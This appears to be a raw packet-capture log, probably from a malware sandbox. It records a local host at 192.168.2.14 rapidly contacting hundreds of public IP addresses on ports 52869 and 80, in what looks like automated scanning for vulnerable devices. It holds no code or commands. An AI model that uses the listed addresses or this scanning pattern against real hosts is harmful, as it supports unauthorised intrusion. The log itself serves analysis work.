                                                Jul 20, 2024 23:05:32.018275023 CEST802747895.219.116.49192.168.2.14
                                                Jul 20, 2024 23:05:32.018369913 CEST2747880192.168.2.1495.243.3.180
                                                Jul 20, 2024 23:05:32.018369913 CEST2747880192.168.2.1495.12.251.221
                                                Jul 20, 2024 23:05:32.018369913 CEST2747880192.168.2.1495.220.243.61
                                                Jul 20, 2024 23:05:32.018369913 CEST2747880192.168.2.1495.50.236.32
                                                Jul 20, 2024 23:05:32.018369913 CEST2747880192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:32.018369913 CEST2747880192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:32.018465042 CEST802747895.88.159.153192.168.2.14
                                                Jul 20, 2024 23:05:32.018470049 CEST802747895.255.231.56192.168.2.14
                                                Jul 20, 2024 23:05:32.018474102 CEST528692696672.79.162.38192.168.2.14
                                                Jul 20, 2024 23:05:32.018482924 CEST528692696640.63.22.218192.168.2.14
                                                Jul 20, 2024 23:05:32.018487930 CEST802747895.81.227.113192.168.2.14
                                                Jul 20, 2024 23:05:32.018546104 CEST802747895.159.5.85192.168.2.14
                                                Jul 20, 2024 23:05:32.018551111 CEST5286926966111.107.133.4192.168.2.14
                                                Jul 20, 2024 23:05:32.018556118 CEST802747895.183.13.8192.168.2.14
                                                Jul 20, 2024 23:05:32.018559933 CEST5286926966173.155.18.45192.168.2.14
                                                Jul 20, 2024 23:05:32.018569946 CEST802747895.224.183.85192.168.2.14
                                                Jul 20, 2024 23:05:32.018600941 CEST5286926966157.67.163.111192.168.2.14
                                                Jul 20, 2024 23:05:32.018619061 CEST5286926966197.181.147.41192.168.2.14
                                                Jul 20, 2024 23:05:32.018624067 CEST528692696684.42.51.191192.168.2.14
                                                Jul 20, 2024 23:05:32.018627882 CEST5286926966203.108.87.69192.168.2.14
                                                Jul 20, 2024 23:05:32.018642902 CEST52869269661.160.152.237192.168.2.14
                                                Jul 20, 2024 23:05:32.018650055 CEST802747895.63.149.249192.168.2.14
                                                Jul 20, 2024 23:05:32.018737078 CEST802747895.67.19.107192.168.2.14
                                                Jul 20, 2024 23:05:32.018742085 CEST802747895.101.7.150192.168.2.14
                                                Jul 20, 2024 23:05:32.018826008 CEST802747895.214.176.104192.168.2.14
                                                Jul 20, 2024 23:05:32.018831015 CEST5286926966206.64.31.236192.168.2.14
                                                Jul 20, 2024 23:05:32.018872976 CEST5286926966202.179.32.99192.168.2.14
                                                Jul 20, 2024 23:05:32.018913984 CEST528692696646.126.78.10192.168.2.14
                                                Jul 20, 2024 23:05:32.018956900 CEST528692696666.117.167.70192.168.2.14
                                                Jul 20, 2024 23:05:32.018961906 CEST5286926966117.218.248.188192.168.2.14
                                                Jul 20, 2024 23:05:32.019188881 CEST5286926966128.109.58.169192.168.2.14
                                                Jul 20, 2024 23:05:32.019193888 CEST52869269661.144.229.105192.168.2.14
                                                Jul 20, 2024 23:05:32.019197941 CEST528692696646.88.221.209192.168.2.14
                                                Jul 20, 2024 23:05:32.019207954 CEST528692696613.89.114.62192.168.2.14
                                                Jul 20, 2024 23:05:32.019212008 CEST5286926966168.150.44.111192.168.2.14
                                                Jul 20, 2024 23:05:32.019314051 CEST5286926966177.76.222.234192.168.2.14
                                                Jul 20, 2024 23:05:32.019323111 CEST5286926966193.29.123.122192.168.2.14
                                                Jul 20, 2024 23:05:32.019329071 CEST5286926966157.122.114.72192.168.2.14
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:32.019499063 CEST2747880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:32.019562960 CEST5286926966184.155.144.12192.168.2.14
                                                Jul 20, 2024 23:05:32.019620895 CEST5286926966211.230.13.173192.168.2.14
                                                Jul 20, 2024 23:05:32.019625902 CEST5286926966198.228.20.233192.168.2.14
                                                Jul 20, 2024 23:05:32.019629955 CEST5286926966199.30.2.87192.168.2.14
                                                Jul 20, 2024 23:05:32.019666910 CEST5286926966167.165.75.73192.168.2.14
                                                Jul 20, 2024 23:05:32.019679070 CEST5286926966184.87.79.26192.168.2.14
                                                Jul 20, 2024 23:05:32.019680977 CEST2747880192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:32.019689083 CEST5286926966209.12.19.10192.168.2.14
                                                Jul 20, 2024 23:05:32.019700050 CEST802747895.216.245.126192.168.2.14
                                                Jul 20, 2024 23:05:32.019730091 CEST2747880192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:32.019730091 CEST2747880192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:32.019730091 CEST2747880192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:32.019730091 CEST2747880192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:32.019754887 CEST528692696644.31.73.44192.168.2.14
                                                Jul 20, 2024 23:05:32.019799948 CEST5286926966190.4.139.242192.168.2.14
                                                Jul 20, 2024 23:05:32.019969940 CEST5286926966145.137.68.101192.168.2.14
                                                Jul 20, 2024 23:05:32.019974947 CEST5286926966154.24.35.247192.168.2.14
                                                Jul 20, 2024 23:05:32.019979000 CEST5286926966143.94.64.200192.168.2.14
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.1474.128.30.189
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.14130.203.78.137
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.14102.126.166.241
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.141.210.218.170
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.14162.110.195.221
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.14109.30.97.197
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.142.138.110.14
                                                Jul 20, 2024 23:05:32.020034075 CEST2696652869192.168.2.1431.50.201.16
                                                Jul 20, 2024 23:05:32.020045042 CEST5286926966196.248.250.76192.168.2.14
                                                Jul 20, 2024 23:05:32.020194054 CEST5286926966212.117.81.111192.168.2.14
                                                Jul 20, 2024 23:05:32.020199060 CEST5286926966150.22.56.153192.168.2.14
                                                Jul 20, 2024 23:05:32.020203114 CEST5286926966129.11.122.111192.168.2.14
                                                Jul 20, 2024 23:05:32.020207882 CEST528692696613.72.181.91192.168.2.14
                                                Jul 20, 2024 23:05:32.020291090 CEST5286926966177.5.153.6192.168.2.14
                                                Jul 20, 2024 23:05:32.020392895 CEST5286926966208.213.254.132192.168.2.14
                                                Jul 20, 2024 23:05:32.020406961 CEST5286926966178.74.79.246192.168.2.14
                                                Jul 20, 2024 23:05:32.020414114 CEST528692696669.34.220.126192.168.2.14
                                                Jul 20, 2024 23:05:32.020441055 CEST528692696688.220.229.137192.168.2.14
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.14132.95.202.215
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.1417.171.65.161
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.1442.79.46.177
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.1486.204.19.17
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.1462.21.135.252
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.14161.186.13.200
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.14130.113.41.148
                                                Jul 20, 2024 23:05:32.020503044 CEST2696652869192.168.2.14126.135.213.175
                                                Jul 20, 2024 23:05:32.020535946 CEST5286926966180.20.215.41192.168.2.14
                                                Jul 20, 2024 23:05:32.020540953 CEST5286926966104.139.76.56192.168.2.14
                                                Jul 20, 2024 23:05:32.020618916 CEST528692696659.246.146.95192.168.2.14
                                                Jul 20, 2024 23:05:32.020631075 CEST5286926966123.115.221.42192.168.2.14
                                                Jul 20, 2024 23:05:32.020636082 CEST5286926966180.249.131.251192.168.2.14
                                                Jul 20, 2024 23:05:32.020787954 CEST5286926966176.175.140.183192.168.2.14
                                                Jul 20, 2024 23:05:32.020812035 CEST5286926966166.79.80.42192.168.2.14
                                                Jul 20, 2024 23:05:32.020845890 CEST5286926966124.232.179.12192.168.2.14
                                                Jul 20, 2024 23:05:32.020981073 CEST5286926966180.189.232.97192.168.2.14
                                                Jul 20, 2024 23:05:32.021105051 CEST528692696694.183.125.31192.168.2.14
                                                Jul 20, 2024 23:05:32.021116972 CEST528692696620.141.224.39192.168.2.14
                                                Jul 20, 2024 23:05:32.021121979 CEST528692696643.186.78.228192.168.2.14
                                                Jul 20, 2024 23:05:32.021131992 CEST5286926966207.173.20.157192.168.2.14
                                                Jul 20, 2024 23:05:32.021184921 CEST5286926966171.203.141.24192.168.2.14
                                                Jul 20, 2024 23:05:32.021188974 CEST5286926966124.192.17.215192.168.2.14
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.14193.248.76.98
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.1472.205.115.146
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.14117.129.252.99
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.14150.186.198.246
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.14183.106.204.162
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.14183.59.191.208
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.14188.199.48.64
                                                Jul 20, 2024 23:05:32.021364927 CEST2696652869192.168.2.1424.245.120.74
                                                Jul 20, 2024 23:05:32.021445990 CEST2747880192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:32.021609068 CEST5286926966211.192.23.252192.168.2.14
                                                Jul 20, 2024 23:05:32.021843910 CEST2696652869192.168.2.1483.220.41.83
                                                Jul 20, 2024 23:05:32.021843910 CEST2696652869192.168.2.14124.236.219.149
                                                Jul 20, 2024 23:05:32.021843910 CEST2696652869192.168.2.1496.118.58.181
                                                Jul 20, 2024 23:05:32.021843910 CEST2696652869192.168.2.14201.254.61.65
                                                Jul 20, 2024 23:05:32.021843910 CEST2696652869192.168.2.14161.69.197.252
                                                Jul 20, 2024 23:05:32.021843910 CEST2696652869192.168.2.1414.64.188.90
                                                Jul 20, 2024 23:05:32.021845102 CEST2696652869192.168.2.14120.143.100.19
                                                Jul 20, 2024 23:05:32.021845102 CEST2696652869192.168.2.1466.230.111.143
                                                Jul 20, 2024 23:05:32.022003889 CEST5286926966126.213.114.105192.168.2.14
                                                Jul 20, 2024 23:05:32.022203922 CEST528692696665.30.175.250192.168.2.14
                                                Jul 20, 2024 23:05:32.022208929 CEST5286926966160.88.6.15192.168.2.14
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.1489.84.82.50
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.14105.61.252.250
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.14205.243.92.199
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.1499.157.239.34
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.14118.145.115.33
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.1481.198.189.131
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.14212.254.248.190
                                                Jul 20, 2024 23:05:32.022425890 CEST2696652869192.168.2.14168.233.49.39
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.1494.124.142.51
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.14218.18.181.208
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.14197.135.108.6
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.14152.218.90.56
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.14175.134.55.203
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.14152.186.151.198
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.1413.138.26.20
                                                Jul 20, 2024 23:05:32.022478104 CEST2696652869192.168.2.1451.148.178.221
                                                Jul 20, 2024 23:05:32.022603989 CEST528692696662.17.26.193192.168.2.14
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.14203.245.149.142
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.14187.39.214.106
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.14212.197.36.240
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.1417.249.122.136
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.1496.55.180.219
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.1468.201.157.11
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.14176.208.112.109
                                                Jul 20, 2024 23:05:32.022609949 CEST2696652869192.168.2.1453.104.158.74
                                                Jul 20, 2024 23:05:32.022614002 CEST528692696640.101.121.194192.168.2.14
                                                Jul 20, 2024 23:05:32.022619963 CEST5286926966184.72.244.166192.168.2.14
                                                Jul 20, 2024 23:05:32.023317099 CEST2696652869192.168.2.1446.140.94.219
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.14125.47.68.181
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.14207.236.94.3
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.1472.78.106.232
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.14120.63.39.150
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.14191.137.205.200
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.14161.128.80.182
                                                Jul 20, 2024 23:05:32.023318052 CEST2696652869192.168.2.141.200.111.50
                                                Jul 20, 2024 23:05:32.023401976 CEST528692696699.129.21.21192.168.2.14
                                                Jul 20, 2024 23:05:32.023418903 CEST528692696670.243.21.189192.168.2.14
                                                Jul 20, 2024 23:05:32.023612976 CEST5286926966167.31.226.137192.168.2.14
                                                Jul 20, 2024 23:05:32.023813963 CEST5286926966206.175.193.81192.168.2.14
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.14205.167.203.127
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.1484.96.184.112
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.145.19.232.245
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.14164.46.151.82
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.14156.8.17.233
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.1492.37.5.52
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.14167.111.204.126
                                                Jul 20, 2024 23:05:32.023936033 CEST2696652869192.168.2.14169.120.213.25
                                                Jul 20, 2024 23:05:32.023981094 CEST528692696669.149.29.243192.168.2.14
                                                Jul 20, 2024 23:05:32.024008989 CEST528692696666.112.35.179192.168.2.14
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.14144.181.35.38
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.1494.210.96.135
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.1480.190.116.2
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.14221.1.36.152
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.14149.11.81.145
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.1447.188.189.126
                                                Jul 20, 2024 23:05:32.024039030 CEST2696652869192.168.2.1424.165.122.205
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.1436.151.23.112
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.1479.180.149.218
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.1476.181.138.218
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.14188.235.214.61
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.14182.25.120.189
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.14151.89.187.172
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.14193.133.163.215
                                                Jul 20, 2024 23:05:32.024185896 CEST2696652869192.168.2.1441.130.175.151
                                                Jul 20, 2024 23:05:32.024234056 CEST2696652869192.168.2.14113.211.98.23
                                                Jul 20, 2024 23:05:32.024234056 CEST2696652869192.168.2.14193.85.31.138
                                                Jul 20, 2024 23:05:32.024234056 CEST2696652869192.168.2.14106.140.193.219
                                                Jul 20, 2024 23:05:32.024234056 CEST2696652869192.168.2.14155.49.251.8
                                                Jul 20, 2024 23:05:32.024234056 CEST2696652869192.168.2.14111.8.128.237
                                                Jul 20, 2024 23:05:32.024234056 CEST2696652869192.168.2.14145.195.83.181
                                                Jul 20, 2024 23:05:32.024235010 CEST2696652869192.168.2.14103.14.70.39
                                                Jul 20, 2024 23:05:32.024235010 CEST2696652869192.168.2.14199.49.205.148
                                                Jul 20, 2024 23:05:32.024715900 CEST528692696662.30.169.120192.168.2.14
                                                Jul 20, 2024 23:05:32.024722099 CEST528692696650.40.58.134192.168.2.14
                                                Jul 20, 2024 23:05:32.024771929 CEST5286926966213.96.142.188192.168.2.14
                                                Jul 20, 2024 23:05:32.025012970 CEST5286926966222.43.96.53192.168.2.14
                                                Jul 20, 2024 23:05:32.025059938 CEST528692696670.203.64.153192.168.2.14
                                                Jul 20, 2024 23:05:32.025090933 CEST528692696674.128.30.189192.168.2.14
                                                Jul 20, 2024 23:05:32.025110960 CEST5286926966156.75.110.98192.168.2.14
                                                Jul 20, 2024 23:05:32.025269032 CEST528692696691.252.143.99192.168.2.14
                                                Jul 20, 2024 23:05:32.025274038 CEST528692696619.225.133.125192.168.2.14
                                                Jul 20, 2024 23:05:32.025302887 CEST5286926966130.203.78.137192.168.2.14
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14204.66.149.99
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14148.30.198.131
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14142.219.250.29
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14125.97.107.120
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14187.140.68.61
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14120.181.185.117
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14141.0.4.62
                                                Jul 20, 2024 23:05:32.025350094 CEST2696652869192.168.2.14223.12.218.46
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.1498.74.12.225
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.14184.126.92.19
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.14216.17.47.144
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.14153.126.184.30
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.1420.226.134.71
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.1459.35.79.156
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.14205.35.169.26
                                                Jul 20, 2024 23:05:32.025383949 CEST2696652869192.168.2.14200.51.205.131
                                                Jul 20, 2024 23:05:32.025449991 CEST5286926966132.95.202.215192.168.2.14
                                                Jul 20, 2024 23:05:32.025470972 CEST5286926966102.126.166.241192.168.2.14
                                                Jul 20, 2024 23:05:32.025475025 CEST528692696683.140.116.41192.168.2.14
                                                Jul 20, 2024 23:05:32.025619030 CEST528692696617.171.65.161192.168.2.14
                                                Jul 20, 2024 23:05:32.025728941 CEST52869269661.210.218.170192.168.2.14
                                                Jul 20, 2024 23:05:32.025805950 CEST528692696642.79.46.177192.168.2.14
                                                Jul 20, 2024 23:05:32.026006937 CEST528692696647.136.236.117192.168.2.14
                                                Jul 20, 2024 23:05:32.026011944 CEST5286926966158.147.144.114192.168.2.14
                                                Jul 20, 2024 23:05:32.026016951 CEST5286926966126.145.61.211192.168.2.14
                                                Jul 20, 2024 23:05:32.026104927 CEST5286926966216.157.160.122192.168.2.14
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14111.193.163.87
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14216.43.210.251
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14183.104.222.96
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14181.62.64.51
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14149.79.37.237
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14154.64.178.0
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.14145.82.197.86
                                                Jul 20, 2024 23:05:32.026231050 CEST2696652869192.168.2.1439.204.207.21
                                                Jul 20, 2024 23:05:32.026287079 CEST5286926966137.110.96.64192.168.2.14
                                                Jul 20, 2024 23:05:32.026292086 CEST5286926966140.146.33.123192.168.2.14
                                                Jul 20, 2024 23:05:32.026329994 CEST5286926966162.110.195.221192.168.2.14
                                                Jul 20, 2024 23:05:32.026410103 CEST528692696686.204.19.17192.168.2.14
                                                Jul 20, 2024 23:05:32.026492119 CEST5286926966193.248.76.98192.168.2.14
                                                Jul 20, 2024 23:05:32.026547909 CEST528692696662.21.135.252192.168.2.14
                                                Jul 20, 2024 23:05:32.026555061 CEST528692696672.205.115.146192.168.2.14
                                                Jul 20, 2024 23:05:32.026583910 CEST528692696645.49.209.48192.168.2.14
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14105.94.86.192
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14116.60.161.57
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14117.170.152.121
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.1468.251.134.43
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14157.223.126.25
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14148.2.12.125
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14174.38.108.83
                                                Jul 20, 2024 23:05:32.026616096 CEST2696652869192.168.2.14159.94.41.117
                                                Jul 20, 2024 23:05:32.026639938 CEST5286926966161.186.13.200192.168.2.14
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.1450.224.137.123
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.1438.225.7.109
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.14143.178.29.251
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.14150.166.164.147
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.14139.130.215.204
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.14219.5.163.32
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.1443.52.6.211
                                                Jul 20, 2024 23:05:32.026667118 CEST2696652869192.168.2.14176.75.220.167
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.14210.141.252.193
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.1470.127.37.49
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.1427.21.93.45
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.1427.205.21.176
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.14196.32.183.241
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.14125.249.246.55
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.14157.63.164.204
                                                Jul 20, 2024 23:05:32.026779890 CEST2696652869192.168.2.1465.119.53.40
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.14132.253.188.42
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.14143.50.74.208
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.14143.165.147.195
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.14146.54.174.109
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.1441.152.208.190
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.148.166.54.209
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.14107.117.108.202
                                                Jul 20, 2024 23:05:32.026875973 CEST2696652869192.168.2.14217.57.179.206
                                                Jul 20, 2024 23:05:32.026942015 CEST5286926966109.30.97.197192.168.2.14
                                                Jul 20, 2024 23:05:32.026947021 CEST528692696683.220.41.83192.168.2.14
                                                Jul 20, 2024 23:05:32.026951075 CEST52869269662.138.110.14192.168.2.14
                                                Jul 20, 2024 23:05:32.027096033 CEST5286926966130.113.41.148192.168.2.14
                                                Jul 20, 2024 23:05:32.027138948 CEST5286926966124.236.219.149192.168.2.14
                                                Jul 20, 2024 23:05:32.027143955 CEST528692696687.140.196.185192.168.2.14
                                                Jul 20, 2024 23:05:32.027156115 CEST528692696696.118.58.181192.168.2.14
                                                Jul 20, 2024 23:05:32.027165890 CEST528692696631.50.201.16192.168.2.14
                                                Jul 20, 2024 23:05:32.027329922 CEST5286926966126.135.213.175192.168.2.14
                                                Jul 20, 2024 23:05:32.027334929 CEST5286926966201.254.61.65192.168.2.14
                                                Jul 20, 2024 23:05:32.027347088 CEST528692696694.124.142.51192.168.2.14
                                                Jul 20, 2024 23:05:32.027352095 CEST52869269661.159.73.15192.168.2.14
                                                Jul 20, 2024 23:05:32.027357101 CEST5286926966161.69.197.252192.168.2.14
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.1427.129.79.40
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.1493.120.173.5
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.14223.250.141.64
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.14173.89.193.209
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.14163.170.37.61
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.14182.202.245.171
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.14102.124.228.209
                                                Jul 20, 2024 23:05:32.027427912 CEST2696652869192.168.2.14223.210.25.241
                                                Jul 20, 2024 23:05:32.027461052 CEST528692696689.84.82.50192.168.2.14
                                                Jul 20, 2024 23:05:32.027532101 CEST528692696614.64.188.90192.168.2.14
                                                Jul 20, 2024 23:05:32.027590036 CEST5286926966203.245.149.142192.168.2.14
                                                Jul 20, 2024 23:05:32.027777910 CEST5286926966218.18.181.208192.168.2.14
                                                Jul 20, 2024 23:05:32.027782917 CEST5286926966105.61.252.250192.168.2.14
                                                Jul 20, 2024 23:05:32.027792931 CEST5286926966197.135.108.6192.168.2.14
                                                Jul 20, 2024 23:05:32.027869940 CEST5286926966187.39.214.106192.168.2.14
                                                Jul 20, 2024 23:05:32.027874947 CEST5286926966152.218.90.56192.168.2.14
                                                Jul 20, 2024 23:05:32.027879953 CEST5286926966212.197.36.240192.168.2.14
                                                Jul 20, 2024 23:05:32.027930975 CEST5286926966205.243.92.199192.168.2.14
                                                Jul 20, 2024 23:05:32.027935982 CEST5286926966120.143.100.19192.168.2.14
                                                Jul 20, 2024 23:05:32.028146029 CEST2696652869192.168.2.1457.131.227.3
                                                Jul 20, 2024 23:05:32.028146029 CEST2696652869192.168.2.1451.192.83.103
                                                Jul 20, 2024 23:05:32.028146029 CEST2696652869192.168.2.1451.84.22.246
                                                Jul 20, 2024 23:05:32.028146029 CEST2696652869192.168.2.1464.61.239.79
                                                Jul 20, 2024 23:05:32.028146029 CEST2696652869192.168.2.14185.138.94.75
                                                Jul 20, 2024 23:05:32.028146982 CEST2696652869192.168.2.1470.251.155.61
                                                Jul 20, 2024 23:05:32.028146982 CEST2696652869192.168.2.14179.192.77.243
                                                Jul 20, 2024 23:05:32.028146982 CEST2696652869192.168.2.14198.163.171.175
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.14142.28.94.87
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.1439.112.44.8
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.14138.118.192.144
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.14196.77.67.46
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.14192.204.207.69
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.1486.190.219.155
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.145.253.12.5
                                                Jul 20, 2024 23:05:32.028189898 CEST2696652869192.168.2.14140.246.6.93
                                                Jul 20, 2024 23:05:32.028261900 CEST528692696666.230.111.143192.168.2.14
                                                Jul 20, 2024 23:05:32.028266907 CEST528692696617.249.122.136192.168.2.14
                                                Jul 20, 2024 23:05:32.028285027 CEST528692696699.157.239.34192.168.2.14
                                                Jul 20, 2024 23:05:32.028290033 CEST5286926966175.134.55.203192.168.2.14
